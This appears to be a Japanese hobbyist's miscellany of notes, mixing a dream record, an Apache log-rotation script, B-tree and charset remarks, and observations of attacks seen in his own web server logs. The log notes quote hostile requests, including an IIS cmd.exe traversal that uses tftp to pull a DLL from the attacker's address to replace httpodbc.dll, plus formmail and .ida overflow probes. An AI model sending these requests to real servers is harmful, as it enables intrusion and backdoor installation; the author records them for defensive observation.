草原に囲まれた教会の様な建物。道端は花で飾られている。
青空と明るい日差しでにぎやかに見える。
10才くらいのウェンディ。何か話しかけられる。高いテンションについていけない。

視界が右へ。手前に納屋。向こうに丘が見える。
太陽の方角からして、東を向いているんだなと思った。
視界の左から20才くらいの落ち着いたウェンディが来た。
全然見た目は違うけど、さっきの10才くらいの彼女と同じだと分かる。
籐のような籠をもっている。

目の前を右から猿が横切る。山吹色の袈裟(?)を着て二足歩行している。
格好からして坊さんだと感じる。顔を見るとニホンザルだった。

猿が何かを召還した。龍だと感じる。形はよく分からない。
空が曇っていることに気づく。
自分もやってみようと思って召還してみた。虹色の尾を引く何かが出てきた。
コイかなまずか、そんな感じのもの。5メートルほど上空でアーチを描く。
猿の出したものと比べてショボイなと思った。

#!/bin/sh
cd /var/apache/logs
al_name=`date '+%Y%m%d'`
mv access_log ${al_name}_access.log
mv error_log ${al_name}_error.log
/usr/local/apache/bin/apachectl graceful
sleep 600
nice gzip -9 -f ${al_name}_access.log ${al_name}_error.log

JavaでB-treeを実装してみた。
データをディスクからI/Oできるようにしてみたが、 デバッグもかねて動作を見てみるとやはり充足率が上がらない模様。

Apache+PHP+PostgreSQLの環境で自前サーバを運用中。

ケータイ用にいろいろ作っているが

ケータイ(SJIS)
FreeBSD(EUC-JP)
PostgreSQL(UNICODE)

Apacheログに新しいタイプの攻撃が来てた。
/cgi-bin/やら/cgi-sys/の直下のfrommail.plとかfrommail.cgiをGETしてる。こんな感じ。

GET /cgi-sys/formmail.cgi HTTP/1.0

ググってみると、POSTメソッドやメールアドレス付きのリクエストは多いのに上記のタイプは少ないみたい。新種かな。少なくともマイサーバでは初物。
現状では404を返してるが、何かリクエストに応えるようにしてみよう。

徹夜ですが何か。

まず

/d/winnt/system32/cmd.exe?/c+dir

にアクセスして、成功すると

/d/winnt/system32/cmd.exe?/c+tftp%20-i%20[アクセス元IPアドレス]%20GET%20cool.dll%20c:\\httpodbc.dll
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20[アクセス元IPアドレス]%20GET%20cool.dll%20d:\\httpodbc.dll
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20[アクセス元IPアドレス]%20GET%20cool.dll%20e:\\httpodbc.dll
/d/httpodbc.dll

としてくるようだ。
バックドア入りのhttpodbc.dllへ置き換えるのかな。

うちのwebサーバに/default.idaへのアクセスを含んだ攻撃が多いので、本物のIISサーバに攻撃したかのような結果を返すようにした。
まぁ/default.idaファイルを作って、IISへ擬似的に攻撃した時の応答を入れただけなんだけれど。

でも、それ以来攻撃のログが増加ぎみ。

HTTPサーバのログに次の行が出力されていた。
「NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC...」
どうやらWinNTAutoAttackという攻撃用ツールらしい。アクセス元IPの80番ポートをつついたら韓国語の文字コードで書かれたページが。

この時にすでに開通していたADSLを使って家サーバを構築。
courier-imapは"./Maildir/.Outbox"を作っておいてそこに下書きメールを移動すると、そのメールを送信してくれることを発見。smtpポートを開放せずにメール送信サーバができた。

80番ポートを開けてたら、およそ九時間後に攻撃が来始めた。